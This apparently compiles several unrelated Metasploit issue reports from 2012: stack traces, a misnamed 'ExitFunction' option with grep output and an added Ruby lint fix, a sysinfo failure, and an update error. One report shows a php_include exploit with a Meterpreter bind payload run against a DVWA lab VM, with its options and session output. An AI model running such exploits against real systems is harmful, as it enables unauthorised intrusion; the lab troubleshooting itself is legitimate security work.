[-]   lib/net/dns/packet.rb:520:in `new_from_data'
[-]   lib/net/dns/packet.rb:152:in `parse'
[-]   lib/net/dns/resolver.rb:979:in `send'
[-]   lib/net/dns/resolver.rb:890:in `query'
[-]   modules/auxiliary/gather/enum_dns.rb:368:in `block in axfr'
[-]   modules/auxiliary/gather/enum_dns.rb:360:in `each'
[-]   modules/auxiliary/gather/enum_dns.rb:360:in `axfr'
[-]   modules/auxiliary/gather/enum_dns.rb:503:in `run'

question about PHP Meterpreter

I am using http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter this module,
doing the test on DVWA http://www.dvwa.co.uk/, this test VM which has an LFI test environment.
This is the basic config:

msf exploit(php_include) > show options

Module options (exploit/unix/webapp/php_include):

   Name      Current Setting                                           Required  Description
   ----      ---------------                                           --------  -----------
   PATH      /                                                         yes       The base directory to prepend to the URL to try
   PHPRFIDB  /opt/metasploit/msf3/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /dvwa/vulnerabilities/fi/?page=XXpathXX                   no        The URI to request, with the include parameter changed to XXpathXX
   POSTDATA                                                            no        The POST data to send, with the include parameter changed to XXpathXX
   Proxies                                                             no        Use a proxy chain
   RHOST     192.168.245.130                                           yes       The target address
   RPORT     80                                                        yes       The target port
   SRVHOST   0.0.0.0                                                   yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT   8080                                                      yes       The local port to listen on.
   SSLCert                                                             no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                                             no        The URI to use for this exploit (default is random)
   VHOST                                                               no        HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  80               yes       The listen port
   RHOST  192.168.245.130  no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(php_include) >

# the result is

msf exploit(php_include) > exploit

[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/TUit3E6Uxxs
[*] Sending stage (39217 bytes) to 192.168.245.130
[*] Local IP: http://192.168.245.128:8080/TUit3E6Uxxs
[*] PHP include server started.
[*] 192.168.245.130 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (127.0.0.1 -> 192.168.245.130:80) at 2012-09-20 09:58:24 +0800
[-] Failed to load extension: No response was received to the core_loadlib request.

[-] Invalid session id

msf exploit(php_include) > sessions

I googled the error, it said some heart beat mechanism, I do not understand!

can someone solve the problem ?

ExitFunction does not exist, should be EXITFUNC

$ grep ExitFunction modules/exploits/ -r
modules/exploits/linux/http/vcms_upload.rb:                                     'ExitFunction' => "none"
modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb:                                        'ExitFunction'         => "seh",
modules/exploits/windows/scada/iconics_genbroker.rb:                                    'ExitFunction' => "thread",
modules/exploits/windows/scada/factorylink_csservice.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/scada/igss9_igssdataserver_rename.rb:                                  'ExitFunction' => "seh",
modules/exploits/windows/scada/procyon_core_server.rb:                                  'ExitFunction' => 'process',
modules/exploits/windows/scada/igss9_misc.rb:                                   'ExitFunction' => "none",
modules/exploits/windows/scada/igss9_igssdataserver_listall.rb:                                 'ExitFunction' => 'process',
modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb:                                 'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb:                                       'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/http/hp_power_manager_filename.rb:                                     'ExitFunction' => 'thread',
modules/exploits/windows/http/solarwinds_storage_manager_sql.rb:                                        'ExitFunction' => "none"
modules/exploits/windows/http/netdecision_http_bof.rb:                                  'ExitFunction' => "seh",
modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/ftp/ricoh_dl_bof.rb:                                   'ExitFunction' => "process",
modules/exploits/windows/misc/wireshark_lua.rb:                                 'ExitFunction' => "none"
modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb:                                       'ExitFunction' => 'process',
modules/exploits/windows/misc/splayer_content_type.rb:                                  'ExitFunction'         => "seh",
modules/exploits/windows/misc/hp_omniinet_4.rb:                                 'ExitFunction' => "process",
modules/exploits/windows/browser/asus_net4switch_ipswcom.rb:                                    'ExitFunction'         => "seh",
modules/exploits/windows/browser/vlc_mms_bof.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/browser/adobe_flash_sps.rb:                                    'ExitFunction'         => "seh",
modules/exploits/windows/browser/mcafee_mvt_exec.rb:                                    'ExitFunction'         => "none",
modules/exploits/windows/browser/realplayer_qcp.rb:                                     'ExitFunction' => "process",
modules/exploits/windows/browser/vlc_amv.rb:                                    'ExitFunction' => "process",
modules/exploits/windows/browser/dell_webcam_crazytalk.rb:                                      'ExitFunction'         => "seh",
modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb:                                     'ExitFunction'         => "none",
modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb:                                 'ExitFunction'         => "seh",
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb:                                 'ExitFunction'         => "process",
modules/exploits/windows/browser/mozilla_reduceright.rb:                                        'ExitFunction' => "process",
modules/exploits/windows/ssh/sysax_ssh_username.rb:                                     'ExitFunction' => "seh"
modules/exploits/windows/fileformat/netop.rb:                                   'ExitFunction' => 'process',
modules/exploits/windows/fileformat/bsplayer_m3u.rb:                                    'ExitFunction' => 'process',
modules/exploits/windows/fileformat/mcafee_showreport_exec.rb:                                  'ExitFunction' => "none",
modules/exploits/windows/fileformat/gsm_sim.rb:                                 'ExitFunction' => 'process',
modules/exploits/windows/fileformat/dvdx_plf_bof.rb:                                    'ExitFunction' => "seh",  #none/process/seh
modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb:                                  'ExitFunction'          => 'process',
modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb:                                        'ExitFunction'          => "process",
modules/exploits/windows/fileformat/subtitle_processor_m3u_bof.rb:                                      'ExitFunction' => "seh",
modules/exploits/windows/fileformat/aviosoft_plf_buf.rb:                                        'ExitFunction' => "seh",
modules/exploits/windows/fileformat/aol_desktop_linktag.rb:                                     'ExitFunction' => "process",
modules/exploits/windows/lotus/domino_icalendar_organizer.rb:                                   'ExitFunction' => "process",
modules/exploits/osx/browser/safari_file_policy.rb:                                     'ExitFunction' => "none",
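
A lint-style check for the misnamed key reported in the issue above, as an added example that is not part of the issue or of the Metasploit code base. The sample source is constructed, the value list is taken from the grep output above, and the helper names are hypothetical.

```ruby
# Added example: find and rewrite the misnamed 'ExitFunction' option key.
# Key names come from the issue above; everything else is an assumption.
WRONG_KEY = 'ExitFunction'
RIGHT_KEY = 'EXITFUNC'
SEEN_VALUES = %w[none seh thread process].freeze # values seen in the grep output

# Matches the key in either quote style, with any spacing around "=>".
KEY_RE = /(?<q>['"])#{WRONG_KEY}\k<q>(?<gap>\s*=>\s*)(?<vq>['"])(?<val>[^'"]*)\k<vq>/

Finding = Struct.new(:line, :value, :known_value)

# Report each non-comment line that sets the wrong key, with its value.
def find_misnamed_exitfunc(source)
  findings = []
  source.each_line.with_index(1) do |text, lineno|
    next if text.lstrip.start_with?('#') # skip commented-out lines
    m = KEY_RE.match(text) or next
    findings << Finding.new(lineno, m[:val], SEEN_VALUES.include?(m[:val]))
  end
  findings
end

# Rewrite the key only, keeping quotes, alignment, value and trailing comments.
def fix_misnamed_exitfunc(source)
  source.each_line.map do |text|
    next text if text.lstrip.start_with?('#')
    text.gsub(KEY_RE) { m = $~; "#{m[:q]}#{RIGHT_KEY}#{m[:q]}#{m[:gap]}#{m[:vq]}#{m[:val]}#{m[:vq]}" }
  end.join
end

# Constructed sample, not taken from any real module.
SAMPLE = <<~'RUBY'
  'DefaultOptions' =>
    {
      'ExitFunction' => "seh",  #none/process/seh
    },
  # 'ExitFunction' => 'process',
  'Opts' => { 'ExitFunction'         => 'bogus' },
  'Other' => { 'EXITFUNC' => 'thread' },
RUBY

if __FILE__ == $0
  find_misnamed_exitfunc(SAMPLE).each do |f|
    puts "line #{f.line}: #{WRONG_KEY} => #{f.value.inspect} (value seen on page: #{f.known_value})"
  end
end
```
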

'sysinfo' fails on java meterpreter

java meterpreter running on an ARM box:

ui:

meterpreter > sysinfo
[-] stdapi_sys_config_sysinfo: Operation failed: 1

log:

^[b[07/19/2012 10:25:43] [e(0)] meterpreter: stdapi_sys_config_sysinfo: Operation failed: 1
[07/19/2012 10:25:43] [d(0)] meterpreter: Call stack:
metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb:42:in `sysinfo'
metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:577:in `cmd_sysinfo'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `call'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `run'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
metasploit-framework/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'
metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'
metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1595:in `cmd_sessions'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:143:in `<main>'

msfupdate troubles

here is the error:

svn: PROPFIND of '/svn/framework3/trunk/lib/gemcache/ruby/1.9.1/gems/sprockets-2.1.2/lib/sprockets/directive_processor.rb': SSL handshake failed: SSL error: Function was interrupted. (https://www.metasploit.com)
